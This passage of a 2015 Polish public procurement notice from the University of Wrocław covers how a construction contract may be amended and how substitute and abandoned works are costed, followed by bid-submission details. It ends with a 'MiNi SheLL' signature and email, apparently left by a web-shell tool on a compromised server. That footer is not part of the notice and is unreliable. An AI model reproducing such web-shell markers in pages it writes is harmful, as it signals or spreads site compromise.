     iż proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie 
     mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia, 
     z zachowaniem terminu wykonania przedmiotu Umowy,
     c) Wykonawca zgłosi Zamawiającemu realizację przedmiotu zamówienia przez 
     Podwykonawców zajdzie potrzeba wykonania zamówienia przy pomocy 
     podwykonawców, pomimo nie wskazania w ofercie żadnej części zamówienia 
     przeznaczonej do wykonania w ramach podwykonawstwa - przy spełnieniu warunków 
     zawartych w § 1 ust. 5, § 4, § 5 ust. 8 i § 14 ust. 2 Umowy, z zachowaniem terminu 
     wykonania przedmiotu Umowy.
 4.  Zmiana stawki podatku VAT od towarów i usług w trakcie realizacji Umowy pociąga za 
      sobą zmianę wynagrodzenia brutto określonego w § 3 ust.1 bez konieczności zmiany   
      niniejszej Umowy. 
 5.  W przypadku wystąpienia w trakcie realizacji przedmiotu Umowy: istotnych i 
      nieistotnych  zmian w dokumentacji projektowej (zgłoszonych przez Wykonawcę, 
      potwierdzonych przez Projektanta i zatwierdzonych przez Zamawiającego), których 
      zaistnienie zostało spowodowane sytuacją niemożliwą do przewidzenia na etapie 
      sporządzania dokumentacji projektowej przez Projektanta, a jednocześnie potrzeba ich 
      wykonania powoduje wstrzymanie realizacji przez Wykonawcę zamówienia 
      podstawowego lub wykonanie robót nieprzewidzianych w dokumentacji projektowej - co 
      pociąga za sobą przesunięcie terminu zakończenia realizacji zamówienia podstawowego, dopuszcza się wydłużenie terminu zakończenia realizacji przedmiotu zamówienia do: 30 dni kalendarzowych ponad termin określony w § 6 ust.1.
6.  W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie Umowy 
     nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia 
     Umowy, Zamawiający może odstąpić od Umowy w terminie 30 dni od powzięcia 
     wiadomości o tych okolicznościach. W przypadku, o którym mowa powyżej 
     Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania 
     części umowy ( art. 145 ustawy Prawo zamówień publicznych ).
7.  Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy 
    konieczności wykonania robót zamiennych w stosunku do przewidzianych 
    w dokumentacji projektowej robót podstawowych - w sytuacji, gdy wykonanie tych robót 
    będzie niezbędne dla prawidłowego tj. zgodnego z zasadami wiedzy technicznej 
    i obowiązującymi na dzień odbioru robót przepisami prawa wykonania przedmiotu 
    umowy, określonego w § 1 ust. 1 Umowy.
    Roboty zamienne - zostaną wykonane po sporządzeniu przez Kierownika Budowy 
    protokołu konieczności wykonania robót zamiennych wraz ze wstępną kalkulacją
    ich wykonania - potwierdzonego przez Inspektorów Nadzoru Inwestorskiego, 
    a w przypadku ustanowienia nadzoru autorskiego również przez Projektanta sprawującego 
    nadzór autorski oraz po zatwierdzeniu przez Przedstawiciela Zamawiającego.
    Rozliczenie robót zamiennych w odniesieniu do robót podstawowych nastąpi na 
    podstawie potwierdzonych przez Inspektorów Nadzoru Inwestorskiego  obmiarów 
    powykonawczych robót zamiennych oraz sporządzonych na ich podstawie   
    kosztorysów różnicowych ( których wartość zostanie uwzględniona w stosunku do 
    wartości przedmiotu Umowy określonej  w § 3 ust. 1 Umowy ) - sporządzonych 
    w oparciu o następujące zasady: 
    a) należy obliczyć: cenę robót podstawowych - w oparciu  o kosztorys robót 
    podstawowych,                                                                                                
    b) należy obliczyć: cenę robót zamiennych - w oparciu o kosztorys robót zamiennych,                                                                                                                                                                
    c) należy obliczyć: różnicę pomiędzy ceną robót podstawowych i ceną robót 
    zamiennych - w oparciu o różnicę pomiędzy wartością kosztorysu robót podstawowych 
    i  kosztorysu robót zamiennych.
    Obliczenia ceny robót podstawowych oraz ceny robót zamiennych należy dokonać 
    w oparciu o następujące zasady:                                                                                                                          
    a) ceny jednostkowe robót podstawowych i zamiennych - należy przyjąć z kosztorysu                                                     
    ofertowego złożonego przez Wykonawcę w postępowaniu przetargowym - stanowiącym 
    załącznik Nr 3 do Umowy  zgodnie  z § 3 ust. 2 Umowy,                                                                                                    
    b) w przypadku - gdy występują roboty, których  nie można rozliczyć w oparciu o ceny 
    jednostkowe robót zawartych w kosztorysie ofertowym - ceny jednostkowe robót 
    zamiennych należy obliczyć przy użyciu średnich składników cenotwórczych ( Rb-g, M, 
    S, Kp, Z ) przyjętych z publikatorów SEKOCENBUD z kwartału poprzedzającego datę 
    zawarcia Umowy - w oparciu o kosztorys robót zamiennych  sporządzony metodą 
    szczegółową, zgodnie z nieobowiązującym rozporządzeniem Ministra Rozwoju 
    Regionalnego i Budownictwa z dn.13 lipca 2001r.w spawie metod kosztorysowania 
    obiektów i robót budowlanych  Dz.U.2001 Nr 80 poz.867.              
    Podstawą do określenia nakładów rzeczowych - niezbędnych do sporządzenia kosztorysu 
    robót zamiennych sporządzonego metodą szczegółową będą w kolejności :                                                                                                              
    a) normy zawarte w kosztorysie ofertowym złożonym przez Wykonawcę w postępowaniu 
    przetargowym i stanowiący załącznik Nr 3 do Umowy,                                                                                     
    b) odpowiednie pozycje Katalogów Nakładów Rzeczowych  KNR-y  - zaakceptowane
    przez Inspektorów Nadzoru Inwestorskiego,
    c) odpowiednie pozycje Katalogów Nakładów Norm Rzeczowych  KNNR-y  -  
    zaakceptowane przez Inspektorów Nadzoru Inwestorskiego,
    d) wycena indywidualna - zaakceptowana przez Inspektorów Nadzoru Inwestorskiego.    
    Ilość jednostek przedmiarowych robót, które miały być pierwotnie wykonane (roboty 
    podstawowe) - należy przyjąć z kosztorysu ofertowego złożonego przez Wykonawcę 
    w postępowaniu przetargowym, stanowiącym załącznik  Nr 3 do Umowy.                                                                                                                                      
    Ilość jednostek przedmiarowych robót zamiennych, należy przyjąć w oparciu  
    o faktyczną ilość wykonanych jednostek robót zamiennych - wynikających z dokonanych 
    i potwierdzonych przez Inspektorów Nadzoru Inwestorskiego obmiarów 
    powykonawczych robót zamiennych.
8. Zamawiający dopuszcza możliwość rezygnacji z wykonania pewnego zakresu robót 
    przewidzianych w dokumentacji  projektowej -  w sytuacji,  gdy ich wykonanie będzie 
    zbędne dla prawidłowego tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi 
    na dzień odbioru robót przepisami prawa, wykonania przedmiotu umowy, określonego 
    w § 1 ust. 1 Umowy.  
    Roboty takie w dalszej części Umowy nazwane zostają  robotami zaniechanymi.                                
    Roboty zaniechane - zostaną pominięte w realizacji po sporządzeniu przez 
    Inspektorów Nadzoru Inwestorskiego protokołu konieczności pominięcia  
    wykonania grupy robót podstawowych wraz ze wstępną kalkulacją ich wartości  -  
   potwierdzonego przez Przedstawiciela Zamawiającego, a w przypadku ustanowienia 
   nadzoru autorskiego również przez Projektanta  sprawującego nadzór autorski oraz
   przy parafowaniu przez Kierownika Budowy.
   Rozliczenie robót zaniechanych w odniesieniu do robót podstawowych  nastąpi na 
   podstawie kosztorysów robót zaniechanych (których wartość zostanie odliczona od 
   wartości przedmiotu Umowy, określonej  w § 3 ust. 1 Umowy ) -  sporządzonych przez 
   Inspektorów Nadzoru Inwestorskiego i  parafowanych przez Kierownika Budowy w oparciu  
   o następujące zasady:
   cenę robót zaniechanych - należy obliczyć w oparciu o kosztorys robót   
   zaniechanych, przyjmując ceny jednostkowe robót zaniechanych z  kosztorysu 
   ofertowego złożonego przez Wykonawcę w postępowaniu przetargowym -  
   stanowiącym załącznik Nr 3 do Umowy.                                                               
   Ilość jednostek przedmiarowych robót zaniechanych - które miały być pierwotnie 
   wykonane,  należy przyjąć z kosztorysu ofertowego złożonego przez Wykonawcę  
   w postępowaniu przetargowym - stanowiącym załącznik Nr 3 do Umowy  zgodnie   
   z § 3 ust. 2 Umowy.
9.Zamawiający dopuszcza  zmianę wartości przedmiotu umowy określonej w § 3 ust. 1 
    Umowy w przypadku: 
     a) konieczności wykonania robót budowlanych niewykraczających swym 
     zakresem poza przedmiot zamówienia, określony w § 1 ust. 1 Umowy,  których 
     ilość jednostek przedmiarowych wskazanych przez Zamawiającego w przedmiarze 
     robót( na podstawie którego Wykonawca sporządził kosztorys ofertowy i dokonał 
     wyceny robót ) została zaniżona,                              
      b) potrzeby wykonania robót budowlanych niewykraczających swym 
     zakresem poza przedmiot zamówienia określony w § 1 ust. 1 Umowy, które      
     zostały pominięte w przedmiarze robót ( na podstawie którego Wykonawca 
     sporządził kosztorys ofertowy i dokonał wyceny robót ), a których wykonanie jest 
     konieczne do zrealizowania i oddania do użytkowania przedmiotu zamówienia 
     określonego w § 1 ust. 1 Umowy,
      c) wystąpienia w trakcie realizacji przedmiotu  umowy konieczności wykonania robót 
      zamiennych w stosunku do przewidzianych w dokumentacji projektowej robót  
      podstawowych - w sytuacji gdy wykonanie tych robót będzie niezbędne dla 
      prawidłowego tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień 
      odbioru robót przepisami prawa, wykonania przedmiotu umowy, określonego 
      w § 1 ust.1 Umowy,
      d) rezygnacji z wykonania pewnego zakresu robót przewidzianych w dokumentacji  
      projektowej - w sytuacji, gdy ich wykonanie będzie zbędne dla prawidłowego tj.  
      zgodnego z zasadami wiedzy technicznej  i  obowiązującymi na dzień odbioru robót 
      przepisami prawa  wykonania przedmiotu umowy, określonego w § 1 ust.1 Umowy,
      e) zawyżonej ilości jednostek przedmiotowych wskazanych przez Zamawiającego 
      w przedmiarze robót (na podstawie którego Wykonawca sporządził kosztorys ofertowy 
      i dokonał wyceny robót) - w odniesieniu do rzeczywistej ilości jednostek robót 
      wykonanych przez Wykonawcę.
10. Zamawiający dopuszcza powierzenie nadzoru inwestorskiego - Inwestorowi 
      Zastępczemu.
11. Wszelkie zmiany Umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bzp.uni.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych
Uniwersytet Wrocławski
ul. Kuźnicza 49/55
51-138 Wrocław pok. 100.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2015 godzina 10:00, miejsce: Biuro Zamówień Publicznych
Uniwersytet Wrocławski
ul. Kuźnicza 49/55
51-138 Wrocław pok. 100.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Termin wykonania zamówienia do 133 dni. 2.Zamawiający nie przewiduje: zawarcia umowy ramowej, zastosowania dynamicznego systemu zakupów, zastosowania aukcji elektronicznej, udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 ustawy Pzp. 3. Zamawiający nie przeprowadził dialogu technicznego. 4. Zamawiający wykluczy z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Pzp wykonawców, którzy nie wykażą spełnienia warunków udziału w postępowaniu oraz na podstawie art. 24 ust. 2a ustawy Pzp wykonawców w stosunku, do których zamawiający wykaże zaistnienie przesłanek wymienionych w niniejszym przepisie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com